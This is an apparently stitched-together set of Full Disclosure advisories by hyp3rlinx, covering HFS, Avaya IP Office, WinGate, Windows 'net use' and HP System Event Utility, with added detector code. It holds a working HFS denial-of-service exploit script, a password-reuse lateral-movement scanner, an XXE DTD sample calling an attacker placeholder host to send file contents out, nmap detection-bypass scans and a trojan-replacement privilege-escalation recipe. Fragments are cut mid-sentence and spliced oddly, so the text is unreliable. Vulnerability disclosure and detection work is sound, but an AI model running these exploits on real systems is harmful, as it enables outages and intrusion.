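    return {"doctypes": len(subsets), "findings": findings,
            "verdict": "xxe-suspect" if findings else "clean"}


# Constructed HTA carrying the DOCTYPE shape from step 1 above.
SAMPLE_HTA = """<html><head><title>Doit</title></head><body>
<?xml version="1.0"?>
<!DOCTYPE hta [
  <!ENTITY % dtd SYSTEM "http://ATTACKER-PLACEHOLDER:8000/datatears.dtd">
  %dtd;
]>
</body></html>"""

# Constructed benign HTA: a DOCTYPE without entities must stay clean.
CLEAN_HTA = """<!DOCTYPE html>
<html><head><title>Inventory</title><HTA:APPLICATION ID="inv"/></head>
<body><script>document.write("ok");</script></body></html>"""

# The two DTD lines that survive in step 2 above.
SAMPLE_DTD = """<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;"""

if __name__ == "__main__":
    print(classify_hta(SAMPLE_HTA))
    print(classify_hta(CLEAN_HTA))
    print(scan_dtd_text(SAMPLE_DTD))
```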


[FD] CVE-2020-13432 - HFS HTTP File Server / Remote Buffer Overflow DoS

2020-06-09 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.rejetto.com


[Product]
HFS Http File Server v2.3m Build 300


[Vulnerability Type]
Remote Buffer Overflow (DoS)


[CVE Reference]
CVE-2020-13432


[Security Issue]
rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual
files or folders are used, allows remote attackers to trigger an
invalid-pointer write access violation via concurrent HTTP requests
with a long URI or long HTTP headers like Cookie, User-Agent etc.

Remote unauthenticated attackers can send concurrent HTTP requests
using an incrementing or specific payload range of junk characters for
values in the URL parameters or HTTP headers sent to the server. This
results in hfs.exe server crash from an invalid pointer write access
violation.

Requirements:
hfs.exe must have at least one saved virtual file or folder present.
Test using a remote IP and NOT from the same machine (localhost).

Dump...

(e4c.3a8): Access violation - code c005 (first/second chance not
available)
For analysis of this file, run !analyze -v
WARNING: Stack overflow detected. The unwound frames are extracted from
outside normal stack bounds.
eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b esi=
edi=0002
eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00210206
ntdll!RtlpResolveAssemblyStorageMapEntry+0x18:
777ef8b4 53  pushebx
0:000> !load winext/msec
0:000> !exploitable
WARNING: Stack overflow detected. The unwound frames are extracted from
outside normal stack bounds.
*** WARNING: Unable to verify checksum for hfs.exe
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at
ntdll!RtlpResolveAssemblyStorageMapEntry+0x0018
(Hash=0x7a29717c.0x325e6a71)

PROCESS_NAME:  hfs.exe

FOLLOWUP_IP:
hfs+8fad7
0048fad7 8945f0  mov dword ptr [ebp-10h],eax

WRITE_ADDRESS:  000a0e08


[References]
https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01


[Exploit/POC]
from socket import *
import time,sys

#HFS HTTP File Server v2.3m build 300.
#Vendor: www.rejetto.com
#Remote Buffer Overflow DoS
#Note: hfs.exe must have at least one saved virtual file or folder on the target
#test using a remote IP and not from the same machine.
#Discovery: hyp3rlinx
#hyp3rlinx.altervista.org
#ISR: ApparitionSec
#=
res=b""     #recv() returns bytes on Python 3, so the empty checks compare against b""
once=0
cnt=0
max_requests=1666

def hfs_dos():

    global ip,port,length,res,once,cnt,max_requests

    cnt+=1

    length += 1
    payload = "A"*length

    try:
        s=socket(AF_INET, SOCK_STREAM)
        s.settimeout(2)
        s.connect((ip,port))
        ##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n"
        bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n"
        s.send(bof.encode("utf-8"))
        if once==0:
            once+=1
            res = s.recv(128)
            if res != b"":
                print("Targets up please wait...")
                if "HFS 2.3m" not in str(res):
                    print("[!] Non vulnerable HFS version, exiting :(")
                    exit()
    except Exception as e:
        if str(e).find("timed out")!=-1:
            if res==b"":
                print("[!] Target is not up or behind a firewall? :(")
                exit()
            else:
                print("[!] Done!")
                exit()
    s.close()

    if cnt == max_requests:
        return False
    return True


def msg():
    print("HFS HTTP File Server v2.3m build 300.")
    print("Unauthenticated Remote Buffer Overflow (DoS - PoC)")
    print("Virtual HFS saved file or folder required.")
    print("Run from a different machine (IP) than the target.")
    print("By Hyp3rlinx - ApparitionSec\n")

if __name__=="__main__":

    length=3

    if len(sys.argv) != 3:
        msg()
        print("Usage: , ")
        exit()

    ip = sys.argv[1]
    port = int(sys.argv[2])

    msg()

    while True:
        if not hfs_dos():
            print("[!] Failed, non vuln version or no virtual files exist :(")
            break



[POC Video URL]
https://www.youtube.com/watch?v=qQ-EawfXuWY


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: May 18, 2020
Vendor reply: May 18, 2020
Vendor confirm vulnerability: May 19, 2020
Vendor creates fix: May 20, 2020
Vendor released new versi

[FD] Avaya IP Office v9.1.8.0 - 11 Insecure Transit Password Disclosure CVE-2020-7030

2020-06-09 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AVAYA-IP-OFFICE-INSECURE-TRANSIT-PASSWORD-DISCLOSURE.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.avaya.com


[Product]
Avaya IP Office v9.1.8.0 - 11

IP Office Platform provides a single, stackable, scalable small
business communications system that grows with your business easily
and cost-effectively.


[Vulnerability Type]
Insecure Transit Password Disclosure


[CVE Reference]
CVE-2020-7030
ASA-2020-077


[Security Issue]
A sensitive information disclosure vulnerability exists in the web
interface component of IP Office that may potentially allow a local user
to gain unauthorized access to the component.

The request URL on port 7071 and the WebSocket requests on port 7070
used by the Atmosphere Framework within Avaya IP Office pass Base64-encoded
credentials in the URL: as the "auth" query-string parameter on port 7071
and as a path segment of the WebSocket URL on port 7070.

https://:7071/serveredition/autologin?auth=QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y=https://x.x.x.x:7070=en_US

wss://:7070/WebManagement/webmanagement/atmosphere/QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y?X-Atmosphere-tracking-id=0&
X-Atmosphere-Framework=2.0.5-javascript=websocket=0=text/x-gwt-rpc;%20charset=UTF-8=true

Base64 credentials: QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y
Value: Administrator:Administrator

The Base64 encoded credentials can be easily disclosed if the machine
used to logon to the web Manager is accessed by an attacker.
The URL plus the credentials can potentially be leaked or stored in
some of the following locations.

Browser History
Browser Cache
Browser Developer Tools
Cached by web proxy
Referer Header
Web Logs
Shared Systems


[Avaya Products affected]
Avaya IP Office 9.x, 10.0 through 10.1.0.7, 11.0 through 11.0.4.2


[References]
https://downloads.avaya.com/css/P8/documents/101067493


[Network Access]
Remote


[Severity]
Medium


[Disclosure Timeline]
Vendor Notification: February 19, 2020
Vendor confirms issue: March 4, 2020
Vendor release advisory fix : June 3, 2020
June 4, 2020 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] WinGate v9.4.1.5998 Insecure Permissions EoP CVE-2020-13866

2020-06-09 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WINGATE-INSECURE-PERMISSIONS-LOCAL-PRIVILEGE-ESCALATION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
wingate.com


[Product]
WinGate v9.4.1.5998

WinGate is a sophisticated integrated Internet gateway and
communications server designed to meet the control,
security and email needs of today's Internet-connected businesses.


[Vulnerability Type]
Insecure Permissions EoP


[CVE Reference]
CVE-2020-13866


[Security Issue]
WinGate has insecure permissions on its installation directory, which
allows local users to gain privileges by replacing an executable file with
a Trojan horse.
The WinGate directory hands (F) full control to Authenticated Users,
who can then run arbitrary code as SYSTEM after a WinGate restart or
system reboot.


C:\Program Files\WinGate>cacls WinGate.exe
C:\Program Files\WinGate\WinGate.exe NT AUTHORITY\Authenticated Users:(ID)F
                                     NT AUTHORITY\SYSTEM:(ID)F
                                     BUILTIN\Administrators:(ID)F
                                     BUILTIN\Users:(ID)R
                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
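As an added example, not part of the advisory or of WinGate, the following parses cacls output such as the listing above and flags any ACE that grants Full, Change or Write to a principal every local user belongs to. The sample is the advisory's own cacls output with each ACE rejoined on one line; the set of low-privilege principals and the treatment of the F/C/W letters are this example's assumptions.

```python
import re

# One cacls ACE: "<principal>:<flags><permission>", e.g. "NT AUTHORITY\Authenticated Users:(ID)F"
ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<flags>(?:\([A-Z]+\))*)(?P<perm>[A-Z])$")

# Principals that any local (or any authenticated) user is a member of.  Assumption of this example.
LOW_PRIV = {"authenticated users", "users", "everyone", "interactive"}
# cacls letters that allow modifying or replacing the file: Full, Change, Write.
WRITE_PERMS = {"F", "C", "W"}


def parse_cacls(output: str, path: str):
    """Parse `cacls <path>` output into (principal, flags, perm) tuples."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):            # the first line carries the path before its ACE
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m:
            aces.append((m["principal"], m["flags"], m["perm"]))
    return aces


def weak_aces(aces):
    """Return (principal, perm) for ACEs that let ordinary users modify the file."""
    weak = []
    for principal, flags, perm in aces:
        leaf = principal.rsplit("\\", 1)[-1].strip().lower()
        if leaf in LOW_PRIV and perm in WRITE_PERMS:
            weak.append((principal, perm))
    return weak


# Constructed sample: the advisory's cacls output for WinGate.exe, one ACE per line.
WINGATE_PATH = r"C:\Program Files\WinGate\WinGate.exe"
SAMPLE_CACLS = r"""C:\Program Files\WinGate\WinGate.exe NT AUTHORITY\Authenticated Users:(ID)F
                                     NT AUTHORITY\SYSTEM:(ID)F
                                     BUILTIN\Administrators:(ID)F
                                     BUILTIN\Users:(ID)R
                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
"""

if __name__ == "__main__":
    for principal, perm in weak_aces(parse_cacls(SAMPLE_CACLS, WINGATE_PATH)):
        print(f"[!] {WINGATE_PATH}: {principal} has {perm}")
```

The same check applies to the directory itself and to every binary a service loads from it; a service binary that an Authenticated User can overwrite is the condition the advisory describes, regardless of which product it belongs to.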


[Affected Component]
WinGate Installation Directory

[Impact Code execution]
true

[Impact Denial of Service]
true

[Impact Escalation of Privileges]
true

[Impact Information Disclosure]
true


[Exploit/POC]
Log on as a standard user, replace WinGate.exe with a trojan executable,
wait for a restart or reboot the system, and your code runs as SYSTEM.


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: May 10, 2020
Vendor acknowledgement: May 10, 2020
Vulnerability confirmed: May 18, 2020
Request status: May 22, 2020
No reply
Notify vendor request CVE: May 26, 2020
No reply
Advised of public disclosure: June 1, 2020
No reply
June 4, 2020 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] netABuse - Windows Insufficient Authentication Logic Scanner

2020-04-10 Thread hyp3rlinx
import os,re,time,signal,sys
from subprocess import *
from multiprocessing import Process

#By John Page (aka hyp3rlinx)
#Apparition Security
#twitter.com/hyp3rlinx
#Advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
#---
#When a remote system's built-in Administrator account is enabled and both the remote and the target system
#passwords match (password reuse) there's no prompt for credentials and we get logged in automagically.
#
#MountPoints2 and Terminal Server Client hints in the Windows registry can help us.
#Typically, MountPoints2 is used by forensic analysts to help determine where an attacker laterally moved to previously.
#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons)
#MountPoints2 key entries are stored like '##10.2.1.40#c$'
#---

BANNER="""
  netABuse
  By Hyp3rlinx

  ApparitionSec
"""

DRIVE="X"
FINDME="The command completed successfully."
REG_MOUNT2=r'REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"'
REG_RDPUSERS=r'REG Query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s'
VULN_FOUND=set()
DELAY=2   #Any lower and we may get inaccurate results.
rdp_server_lst=[]

#Return prior network logons to remote systems.
def mountpoints2():
    mntpoint2_connections=[]
    try:
        #universal_newlines=True gives str output on Python 3 so the find()/rfind() calls below work
        p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True, universal_newlines=True)
        tmp = p.stdout.readlines()
    except Exception as e:
        print("[!] "+str(e))
        return False
    for x in tmp:
        idx = x.find("##")
        clean = x[idx:]
        idx2 = clean.rfind("#")
        ip = clean[2:idx2]
        ip = re.sub(r"#.*[A-Z,a-z]","",ip)
        if ip not in mntpoint2_connections:
            mntpoint2_connections.append(ip)
    mntpoint2_connections = list(filter(None, mntpoint2_connections))
    p.kill()
    return mntpoint2_connections


#Terminal Server Client stores remote server connections.
def rdp_svrs():
    global rdp_server_lst
    try:
        p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True, universal_newlines=True)
        tmp = p.stdout.readlines()
        for key in tmp:
            if key.find("Servers")!=-1:
                pos = key.rfind("\\")
                srv = key[pos + 1:].replace("\r\n","").strip()
                rdp_server_lst.append(srv)
        p.kill()
    except Exception as e:
        print("[!] "+str(e))
        return False
    return True


#Disconnect
def del_vuln_connection(ip):
    try:
        print("[!] Disconnecting vuln network logon connection.\n")
        call(r"net use "+DRIVE+":"+" /del")
    except Exception as e:
        print("[!] "+str(e))


#Check connection
def chk_connection(ip):
    print("[+] Testing: "+ip)
    sys.stdout.flush()
    cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True, universal_newlines=True)
    #communicate() returns (stdout, stderr); ping writes its replies to stdout
    stdout, stderr = cmd.communicate()
    if "Reply from" in stdout and "Destination host unreachable" not in stdout:
        print("[*] Target up!")
        return True
    else:
        print("[!] Target unreachable :(")
        return False


#Test vuln
def Test_Password_Reuse(ip):
    print("[+] Testing "+ip + " the builtin Administrator account.\n")
    sys.stdout.flush()
    try:
        p = Popen("net use X: "+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True, universal_newlines=True)
        err = p.stderr.readlines()

        if err:
            e = str(err)
            if e.find("error 53")!=-1:
                print("[*] Network path not found\n")
                return
            elif e.find("error 1219")!=-1:
                print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n")
                return
            elif e.find("error 85")!=-1:
                print("[*] The local device name is already in use.\n")
                return
            else:
                print(e+"\n")

        tmp = p.stdout.read()

        if FINDME in tmp:
            print("[*] Password reuse for the built-in Administrator found!")
            print("[+] Connected to target: "+ ip)
    except Exception as e:
        print("[!] "+str(e))

#(the remainder of the script is cut off in the archived post)

[FD] Microsoft Windows "net use" Logon CMD / Insufficient Password Prompt

2020-04-06 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Windows "net use" Command

Connects a computer to or disconnects a computer from a shared
resource, or displays information about computer connections.
The command also controls persistent net connections. Used without
parameters, net use retrieves a list of network connections.


[Vulnerability Type]
Insufficient Password Prompt


[CVE Reference]
N/A


[Security Issue]
The Windows "net use" network logon (type 3) command does not prompt for
authentication when the built-in Administrator account is enabled and
both the remote and originating systems suffer from password reuse. This
also works as a "standard" user, but unfortunately we do not gain high
integrity privileges. However, it opens the door and increases the attack
surface if the box we laterally move to has other vulnerabilities present.

In contrast, authenticating via the UNC path "\\x.x.x.x\c$" using an
Explorer-type logon does prompt for credentials as expected.
The authentication mechanisms of the two network logon methods are
inconsistent and in my opinion leave an authentication loophole
invitation.
Moreover, since this targets the built-in Administrator account, one would
think there would be more or equal security measures in place, not
less.

Requirements:
1) Remote system built-in Administrator account is enabled
2) Origination system users account password and the remote system
Administrator passwords match (reuse).

Typically, to gain Admin privileges on remote logon you may have to
create and enable "LocalAccountTokenFilterPolicy" but NOT in this
case.
Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT
need to exist and is NOT enabled and has no bearing on the issue.

However, if "FilterAdministratorToken" is enabled in registry on the
remote system then the above loophole scenario fails.
Interestingly, the "FilterAdministratorToken" setting does not seem to
exist by default in the Windows registry.

Therefore, if an attacker pops a box they can check the "MountPoints2"
registry values usually used by forensic analysts for previous network
connections, try them, and if there's password reuse (likely) BOOM,
automagic logon.

This vuln occurs due to inconsistent password dialog prompting depending
on whether the "net use" logon method is used.
When testing make sure to log out then log back in after changing
passwords so the environment is clean.

e.g.

1) Passwords for both systems are different and remote built-in
Administrator account active:

C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator

Enter the password for 'Administrator' to connect to '192.168.x.x':
System error 5 has occurred.

Access is denied.

2) Passwords for both origination system and remote match:

C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
The command completed successfully.

By the way as a side note DCERPC calls work as well, if both systems
happen to have same password.
c:\>getmac /s x.x.x.x /U Administrator

MSRC in their response, pointed out that "No login prompt on remote
connection if both Administrator password are the same."
Ok, but why does "net use" not follow the same pattern as doing a
UNC-Path type of logon, where we get the expected cred dialog box?

Expected result: Consistent password dialog box, no matter if
passwords match or not.
Actual Result: No prompt for a password if both systems passwords are the same.

Tested successfully on fully patched Windows 10 using VM, also across
LAN to a non-domain connected PC.


[Exploit/POC]
import os,re,time,signal,sys
from subprocess import *
from multiprocessing import Process

#By John Page (aka hyp3rlinx)
#Apparition Security
#twitter.com/hyp3rlinx
#---
#When a remote system's built-in Administrator account is enabled and both the remote and the target system
#passwords match (password reuse) there's no prompt for credentials and we get logged in automagically.
#
#MountPoints2 and Terminal Server Client hints in the Windows registry can help us.
#Typically, MountPoints2 is used by forensic analysts to help determine where an attacker laterally moved to previously.
#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons)
#MountPoints2 key entries are stored like '##10.2.1.40#c$'
#---

BANNER="""
_   __   ___  __  ___ __
   / | / / /_  __/  /   |  / __ )/ / / / ___// /
  /  |/ / __/   / // /| | / __  / / / /\__ \/ __/

[FD] Recon-Informer v1 - Intel for offensive systems tool.

2020-04-03 Thread hyp3rlinx
import logging,os,ctypes,sys,argparse,time,re
from subprocess import *
from datetime import datetime
from pkgutil import iter_modules
import pkg_resources

#Recon-Informer (c)
#By John Page (Hyp3rlinx)
#ApparitionSec
#hyp3rlinx.altervista.org
#twitter.com/hyp3rlinx
#apparition...@gmail.com
#PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc
#==
#
#Recon-Informer is a basic real-time anti-reconnaissance detection tool for offensive
#security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy.
#
#Purpose:
#Recon-Informer is NOT meant for protecting public facing or LAN critical enterprise systems whatsoever.
#Its purpose is to detect possible recon against our attacker system on a LAN to provide us defensive intel.
#Therefore, this script is most useful for basic short-term defensive visibility.
#
#Features:
#Attempt to detect and identify typical port scans generated using Nmap including scan type.
#-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy).
#
#FYI, scans such as FIN don't work well on Windows OS and firewalls can make scans return incorrect results.
#XMAS scans work against systems following RFC 793 for TCP/IP and don't work against any Windows versions,
#NULL is another type that doesn't work well on Windows.
#
#However, FIN, NULL and XMAS scans can work on Linux machines. Therefore, Recon-Informer checks the OS
#it's run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied.
#With the -s flag you can add extra scan types to detect that otherwise would be ignored.
#
#PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default.
#Not enabled by default as most Nmap scans begin with an ARP who-has request; when using the -p flag you
#will see this detection preceding most scans. Also, you may see (noise) non-reconnaissance related ARP
#requests or even ones resulting from your own ICMP pings; this exclusive detection may fail if a scan uses the -Pn flag.
#
#ICMP
#Note: If the nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping.
#
#BLOCK -b offending IP(s): default is no blocking as packets can be spoofed causing DoS.
#Firewall rules for blocks are in-bound "ANY" but still allow out-bound.
#FW rules are named like ReconInformer_.
#
#DELETE FW RULE -d to remove FW rules for blocked hosts.
#
#WHITELIST -w HOST-IP(s) you never want to block on.
#
#FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOS 137 etc.
#Ignore packets destined for specific ports to try to reduce false positive probe alerts.
#
#IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKs
#from SMB connected shares to try to reduce false positives.
#
#LOG -l flag, default size limit for writing to disk is 1MB.
#
#UDP protocol is ignored by default to try to reduce false positives from sources like NetBIOS, SNMP etc.
#To detect UDP scans use the -u flag, which can also be combined with the -f port filter
#(reduce noise) on specific dest ports like 137,161,1900,2869,7680.
#
#PCAP saving -s flag, default size limit is also 1MB.
#
#RESTORE CONSOLE -r focus the console window (Win OS) if the console is minimized on port scan detect.
#
#Private Network range:
#Wrote this for basic LAN visibility for my attacker machine; packets from public IP ranges are ignored.
#
#BYPASS examples --scanflags and custom packet window sizes:
#Recon-Informer does not try to detect every case of --scanflags or specially crafted packets.
#
#These scans can bypass Recon-Informer and correctly report open ports found.
#nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139
#nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x
#
#Therefore, I accounted for some of these in Recon-Informer to report these detections.
#
#SCANFLAGS
#nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct)
#nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct)
#nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothing useful returned)
#nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful)
#nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful)
#
#The above scanflag examples would have bypassed detection if we didn't check packets for them.
#Useful scanflags that return open ports and bypassed Recon-Informer prior to scanflag checks:
#
#10  (0x0a) SYNPSH
#34  (0x22) SYNURG
#42  (0x2a) SYNPSHURG
#66  (0x42) SYNECN
#74  (0x4a) SYNPSHECN
#98  (0x62) SYNURGECN
#106 (0x6a) SYNPSHURGECN
#130 (0x82) SYNCWR
#138 (0x8a) SYNPSHCWR
#162 (0xa2) SYNURGCWR
#170 (0xaa) SYNPSHURGCWR
#194 (0xc2) SYNECNCWR
#202 (0xca) SYNPSHECNCWR
#226 (0xe2) SYNURGECNCWR
#234 (0xea) SYNPSHURGECNCWR
#
#Custom packet window size from 1024 typical of Nmap SYN scans to a size of 666 for the bypass!
#ip=IP(dst="192.168.1.104")
#syn=TCP(sport=54030,dport=139,window=666,flags="S")
#send(ip
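The bypass table in the comment header above can be reproduced and turned into a check. The following is an added example, not part of Recon-Informer: it parses an Nmap --scanflags argument into a TCP flags byte, confirms each decimal value in the table, and contrasts a scan-type check that masks to the six classic flags with one that looks at all eight bits. That shows why an ECE-only probe is reported as a NULL scan by the first check and why a SYN carrying PSH/URG/ECE/CWR has to be reported as a SYN scan rather than ignored. It uses Nmap's own flag names (ECE for the bit the table calls ECN) and does not need scapy.

```python
# Nmap --scanflags names and their TCP header bits.
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08,
             "ACK": 0x10, "URG": 0x20, "ECE": 0x40, "CWR": 0x80}
CLASSIC_MASK = 0x3F      # FIN..URG: the six flags a naive scan-type check looks at
XMAS = TCP_FLAGS["FIN"] | TCP_FLAGS["PSH"] | TCP_FLAGS["URG"]


def parse_scanflags(spec: str) -> int:
    """Turn an Nmap --scanflags argument into a flags byte.

    Accepts numeric values ('0x42', '66') or concatenated names ('SYNPSH').
    """
    spec = spec.strip()
    if spec.lower().startswith("0x"):
        return int(spec, 16) & 0xFF
    if spec.isdigit():
        return int(spec) & 0xFF
    value, rest = 0, spec.upper()
    while rest:
        for name, bit in TCP_FLAGS.items():
            if rest.startswith(name):
                value |= bit
                rest = rest[len(name):]
                break
        else:
            raise ValueError(f"unknown flag in {spec!r}")
    return value


def flag_names(flags: int):
    return [n for n, b in TCP_FLAGS.items() if flags & b]


def classify_naive(flags: int) -> str:
    """Scan-type check that only looks at the six classic flags (FIN..URG)."""
    f = flags & CLASSIC_MASK
    if f == 0:
        return "NULL"            # an ECE-only or CWR-only probe lands here
    if f == TCP_FLAGS["SYN"]:
        return "SYN"
    if f == TCP_FLAGS["FIN"]:
        return "FIN"
    if f == XMAS:
        return "XMAS"
    if f == TCP_FLAGS["ACK"]:
        return "ACK"
    return "OTHER"               # SYN+PSH, SYN+URG, ... are dropped on the floor


def classify(flags: int) -> str:
    """Same check over all eight bits, plus the 'SYN with extra flags' case.

    A SYN carrying PSH/URG/ECE/CWR still gets SYN/ACK from open ports, so it
    is reported as a SYN scan with the extras named.
    """
    if flags == 0:
        return "NULL"
    if flags & TCP_FLAGS["SYN"] and not flags & (TCP_FLAGS["ACK"] | TCP_FLAGS["RST"] | TCP_FLAGS["FIN"]):
        extras = [n for n in flag_names(flags) if n != "SYN"]
        return "SYN" if not extras else "SYN+" + "+".join(extras)
    if flags == TCP_FLAGS["FIN"]:
        return "FIN"
    if flags == XMAS:
        return "XMAS"
    if flags == TCP_FLAGS["ACK"]:
        return "ACK"
    return "OTHER(" + "+".join(flag_names(flags)) + ")"


# The bypass table from the comment header, as (decimal value, Nmap spelling).
BYPASS_TABLE = [(10, "SYNPSH"), (34, "SYNURG"), (42, "SYNPSHURG"), (66, "SYNECE"),
                (74, "SYNPSHECE"), (98, "SYNURGECE"), (106, "SYNPSHURGECE"),
                (130, "SYNCWR"), (138, "SYNPSHCWR"), (162, "SYNURGCWR"),
                (170, "SYNPSHURGCWR"), (194, "SYNECECWR"), (202, "SYNPSHECECWR"),
                (226, "SYNURGECECWR"), (234, "SYNPSHURGECECWR")]

if __name__ == "__main__":
    for value, spec in BYPASS_TABLE:
        print(f"{value:3d} {spec:16s} naive={classify_naive(value):6s} full={classify(value)}")
    print("ECE only: naive =", classify_naive(0x40), "full =", classify(0x40))
```

In a sniffer the flags byte comes straight from the TCP header (scapy's `TCP.flags` converts to int), so `classify()` can be applied per packet; the window-size heuristic mentioned in the header is a separate check and is not covered here.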

[FD] Recon-Informer v1 - Intel for offensive systems tool

2020-03-31 Thread hyp3rlinx
Recon-Informer is a basic real-time anti-reconnaissance detection tool for
offensive security systems, useful for penetration testers. It runs on
Windows/Linux and leverages Scapy.

https://github.com/hyp3rlinx/0/blob/master/Recon-Informer.py

Thanks and stay safe to all,
hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2019-18915 HP System Event Utility / Privilege Escalation Vulnerability

2020-02-14 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.hp.com


[Product]
HP System Event Utility


The genuine HPMSGSVC.exe file is a software component of HP System Event
Utility by HP Inc.
HP System Event Utility enables the functioning of special function keys on
select HP devices.


[Vulnerability Type]
Local Privilege Escalation



[CVE Reference]
CVE-2019-18915



[Security Issue]
The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and
execute it with SYSTEM integrity.
